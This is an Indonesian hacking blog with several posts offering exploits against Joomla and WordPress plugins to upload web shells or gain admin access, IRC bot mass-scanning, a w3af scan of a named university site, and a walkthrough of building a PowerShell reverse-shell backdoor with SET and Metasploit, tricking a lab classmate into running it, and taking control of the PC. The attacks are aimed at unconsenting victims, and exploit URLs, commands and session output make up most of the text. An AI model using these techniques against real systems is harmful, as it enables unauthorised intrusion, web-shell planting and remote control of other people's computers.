Exploit

Cara Scan Bug Web Menggunakan Scanner di IRC

March 20, 2015 by Jack Wilder Leave a Comment

Kali ini mau sedikit berbagi aja buat kalian yang belum tau cara scan web pake scanner di IRC. Jadi kita gak perlu dorking manual karena bot yang bekerja.
Yang kalian butuhkan adalah IRC Client yang nantinya akan digunakan untuk konek ke server IRC.
Jika kalian menggunakan Windows bisa gunakan mIRC atau yang pakai Linux bisa pakai XChat.
Di tutorial ini saya pakai XChat.
Oke pertama kita tentukan dulu mau konek ke server mana.
Kali ini saya mau konek ke server ByroeNet.
irc.byroenet.com default port nya biasa, 6667 . Lalu Klik connect.

Lalu tunggu sampai kita terhubung ke server.

Kalo sudah konek nanti tampilannya seperti ini :

Jika kalian sudah tau mau join channel amna, tinggal masukkan channel nya.
Tapi kalau kalian belum tau, pilih opsi terakhir, kita akan mencari nya 😀

Disini saya masuk channel #c0d3d
Lihat di topic, biasanya channel yang menyediakan scanner ada tulisan SCAN ON.

Masukkan perintah !help untuk mengetahui command apa saja yang bisa kita gunakan di channel tersebut.
Ada banyak command yang bisa digunakan salahsatunya :
[!]Help <=> JCE Vuln Scan: !j [dork]

Artinya kita bisa melakukan scan bug JCE dengan command !j [dork]
Contoh : !j “/images/stories”
Oke mari kita coba.

Tinggal nunggu hasil scanner nya biar kerja 😀

Sekian tutor kali ini semoga bermanfaat.

Joomla Simple Photo Gallery – Arbitrary File Upload Vulnerability

March 17, 2015 by Jack Wilder 2 Comments

Kali ini saya mau share exploit terhadap CMS Joomla yang beberapa hari yang lalu di share di 1337day. Yaitu Joomla Simple Photo Gallery – Arbitrary File Upload Vulnerability. Author dari Exploit ini adalah CrashBandicot. Thanks bro 😀 !
Oke langsung saja.
Google dork : use your brain bitch !!
Victim : /administrator/components/com_simplephotogallery/lib/uploadFile.php
HTML Exploit :
Download Here

Masih bingung ?
Oke saya jelaskan.
Anggap saja kalian sudah dapat target.

Buka dan edit file html exploiter nya dengan editor.
Ganti url nya dengan url target.

Buka file html tadi lewat browser dan upload shell lewat uploader disitu.

Shell nya ada di http://localhost/shell_[jembut].php

Dorr !!

Sekian tutorial kali ini 😀

WordPress Fraction Theme Version 1.1.1 Suffers from a Privilege Escalation Vulnerability

March 11, 2015 by Jack Wilder Leave a Comment

Exploit nya masih anget kak :p . Baru kemaren dirilis di 1337day. Oke langsung saja ya alat dan bahat nya :3
Google Dorks :
USE YOUR BRAIN, BITCH !!

Vulnerability : /fraction-theme/functions/ajax.php

How to Exploit :
localhost/wordpress/wp-admin/admin-ajax.php?action=ot_save_options&users_can_register=1
Jika fitur register sebelumnya dilarang, dengan command ini maka fitur register akan dibuka secara ilegal.

Habis itu, buka localhost/wordpress/wp-login.php?action=register

Cek email, masukin user dan password, logged to dashboard as Admin 🙂

Sekian tutor kali ini semoga bermanfaat.

Exploit JDownloads and Upload Shell Bypass

February 23, 2015 by Jack Wilder Leave a Comment

Oke berhubung banyak sekali yang show off di grup fb pake poc ini, ane coba sare aja barangkali bermanfaat. Exploit JDownloads ini adalah exploit untuk cms joomla.
Oke langsung saja ke tutorial :

Google dork :
Powered by JDownloads
Exploit :
http://localhost/index.php?option=com_jdownloads&Itemid=1&task=upload

Upload shell berekstensi .php.j .
contoh : shell.php.j

Shell access :
http://localhost/images/jdownloads/screenshots/shell.php.j

Sekian tutor singkat kali ini semoga bermanfaat.

Menemukan Bug Website dengan w3af – Web Application Attack and Audit Framework

December 24, 2014 by Jack Wilder 1 Comment

Oke iseng iseng aja tadi nyoba tools yang ada di BackBox kesayangan. Namanya w3af. Tools ini berfungsi untuk mencari bug pada sebuah website. Ada dua versi, versi GUI dan versi CLI / Console.
Oke sekarang mari saya tunukkan bagaimana tools ini bekerja.
Berhubung saya lebih suka versi console, di tutorial ini saya pakai yang versi console.
Pertama buka terminal, login root.
[email protected]:/home/jackwilder# w3af_console

Kita gunakan perintah help untuk melihat command yang bisa digunakan
w3af>>> help

Disitu ada perintah target dengan keterangan Configure the target URL.
Berarti kita set target disitu.
w3af>>> target
w3af/config:target>>> w3af/config:target>>> set target http://library.upgrismg.ac.id/ <= sesuaikan sendiri targetnya.

Setelah target di set, kita kembali ke menu utama, lalu masuk ke menu plugins.
w3af/config:target>>> back
w3af>>> plugins

Gunakan perintah help untuk melihat apasaja yang bisa dipakai.
w3af/plugins>>> help

Disana ada perintah audit dengan keterangan View, configure and enable audit plugins.
Kita menggunakan nya untuk menentukan bug apa yang kita cari.
w3af/plugins>>> audit

Disitu ada banyak pilihan, karena saya ingin mencari bug sqli, saya gunakan perintah
w3af/plugins>>> audit sqli
kalau kalian ingin mencoba semua nya, bisa gunakan perintah ” audit all “

Gunakan perintah discovery untuk scan lanjutan.
w3af/plugins>>> discovery
Ada banyak pilihan, salahsatunya findBackdoor dengan keterangan Find web backdoors and web shells.
Kita coba gunakan itu, barangkali beruntung sudah ada yang masuk duluan :v .
w3af/plugins>>> discovery findBackdoor
Untuk mencoba semua nya bisa gunakan perintah ” discovery all “

Command output digunakan untuk setting output dari hasil scan.
w3af/plugins>>> output
saya pilih console dan textFile .
w3af/plugins>>> output console, textFile

Setelah semua nya beres, kembali ke menu utama
w3af/plugins>>> back

Lets do it !
w3af>>> start

dan tunggu w3af bekerja untuk kita.

nah, untuk output txt nya bisa dilihat di /usr/share/w3af/ .
Sekian dan semoga bermanfaat.
keep Exploiting.

Original Content created by yuyudhn

Hack Windows 7 with S.E.T + Metasploit on BackBox Linux

December 2, 2014 by Jack Wilder 3 Comments

Oke kali ini saya akan share tutorial cara meremote komputer korban dengan metasploit. Tools ini sudah tersedia di distro pentest linux seperti backbox, backtrack, kali linux, blackbuntu dll. Yang saya gunakan disini adalah BackBox Linux. saya akan mempraktekkan cara meremote komputer target yang berada dalam satu jaringan. Victim menggunakan OS Windows 7 dan Firewall dalam keadaan aktif. Oh iya, doi juga pake antivirus Avast. jadi kalo cuma pake backdoor biasa untuk membuka meterpreter session, dijamin backdoor mu dihajar sama avast sebelum sempet di eksekusi.
Pertama, kita buat backdoor dulu. Disini kita menggunakan Social Engineering Toolkit yang sudah tersedia di BackBox.
[email protected]:~# setoolkit .
[*] Checking to see if bleeding-edge repos are active.
[!] Bleeding edge repos were not detected. This is recommended.
Do you want to enable bleeding-edge repos for fast updates [yes/no]: no
[:(] Your loss! Bleeding edge provides updates regularly to Metasploit, SET, and others!
[-] New set_config.py file generated on: 2014-12-02 09:52:26.378618
[-] Verifying configuration update…
[*] Update verified, config timestamp is: 2014-12-02 09:52:26.378618
[*] SET is using the new config, no need to restart

Select from the menu:

1) Social-Engineering Attacks
2) Fast-Track Penetration Testing
3) Third Party Modules
4) Update the Social-Engineer Toolkit
5) Update SET configuration
6) Help, Credits, and About

99) Exit the Social-Engineer Toolkit

set> 1
Pilih nomor satu, Social-Engineering Attacks
Select from the menu:

1) Spear-Phishing Attack Vectors
2) Website Attack Vectors
3) Infectious Media Generator
4) Create a Payload and Listener
5) Mass Mailer Attack
6) Arduino-Based Attack Vector
7) Wireless Access Point Attack Vector
8) QRCode Generator Attack Vector
9) Powershell Attack Vectors
10) Third Party Modules

99) Return back to the main menu.

set> 9
Pilih nomor 9, karena kita akan membuat Powershell Attack Vectors

1) Powershell Alphanumeric Shellcode Injector
2) Powershell Reverse Shell
3) Powershell Bind Shell
4) Powershell Dump SAM Database

99) Return to Main Menu

set:powershell>1
pilih Powershell Alphanumeric Shellcode Injector

set> IP address for the payload listener: 10.11.12.29 <= isi dengan ip kita. cek di ifconfig.
set:powershell> Enter the port for the reverse [443]:6969 <= isi port terserah.
[*] Prepping the payload for delivery and injecting alphanumeric shellcode…
[*] Generating x86-based powershell injection code…
[*] Finished generating powershell injection bypass.
[*] Encoded to bypass execution restriction policy…
[*] If you want the powershell commands and attack, they are exported to /home/jackwilder/.set/reports/powershell/
set> Do you want to start the listener now [yes/no]: : no
[*] Powershell files can be found under /home/jackwilder/.set/reports/powershell/

Pembuatan Undetected Backdoor

Disitu tertulis “Powershell files can be found under /home/jackwilder/.set/reports/powershell/” . Coba buka folder nya, … ketemu.
File nya masih txt.
Rename jadi bentuk bat / cmd . Terserah.
Saatnya Social Engineering on action 😀

Lokasi backdoor yang dibuat dengan SET

Tugas mu adalah menyebarkan file backdoor yang kamu buat tadi dan korban harus mengeksekusinya.
Berhubung
saya anak lab, gampang aja :v . Tinggal dalih mau copy tugas, bawa
flashdisk mu, tancepin kesana, ya sambil copy tugas beneran gak apa apa,
klik sendiri program nya :v .
Sampai disini bisa dibilang kita sudah melangkah 60% lah 😀
Balik lagi ke BackBox kesayangan mu, buka metasploit.

[email protected]:~# msfconsole
=[ metasploit v4.10.1-dev [core:4.10.1.pre.dev api:1.0.0]]
+ — –=[ 1344 exploits – 739 auxiliary – 217 post ]
+ — –=[ 340 payloads – 35 encoders – 8 nops ]
+ — –=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 10.11.12.29 <= sesuaikan denan ip yang ada di backdoor
LHOST => 10.11.12.29
msf exploit(handler) > set LPORT 6969 <= sesuaikan dengan port yang ada di backdoor
LPORT => 6969
msf exploit(handler) > exploit

Metasploit on Action

And…..
[*] Started reverse handler on 10.11.12.29:6969
[*] Starting the payload handler…
[*] Sending stage (769536 bytes) to 10.11.12.179
[*] Meterpreter session 1 opened (10.11.12.29:6969 -> 10.11.12.179:49164) at 2014-12-01 02:07:42 +0700

Meterpreter Session

Welcome to Meterpreter Session.. honey… :*

meterpreter > sysinfo
Computer        : ISIS-PC << anggota ISIS dia wakakakaka :v .
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : id_ID
Meterpreter     : x86/win32

meterpreter > run vnc
[*] Creating a VNC reverse tcp stager: LHOST=10.11.12.29 LPORT=4545
[*] Running payload handler
[*] VNC stager executable 73802 bytes long
[*] Uploaded the VNC agent to C:UsersisisAppDataLocalTemppggDswu.exe (must be deleted manually)
[*] Executing the VNC agent with endpoint 10.11.12.29:4545…
[*] Failed. Maybe used by another program.
Gagal membuka desktopnya 🙁
kemungkinan file pggDswu.exe yang diupload dihajar sama avast.

Kalo pengen ngebuka cmd nya, lakukan perintah berikut
meterpreter > execute -M -f cmd.exe -i
Process 2404 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

Sebenernya masih banyak yang bisa dilakukan disini. tapi berhubung ane cuma iseng ane upload aja file koleksi ane ke victim .

meterpreter > upload /home/jackwilder/jembut/oww/wkwk/fucking_time.mp4 D:
[*] uploading /home/jackwilder/jembut/oww/wkwk/fucking_time.mp4
[*] uploaded /home/jackwilder/jembut/oww/wkwk/fucking_time.mp4 > D:fucking_time.mp4
meterpreter >

Sekian yang dapat saya berikan.
At least .Hack the Gibson…and remember…hugs are worth more than handshakes. 😉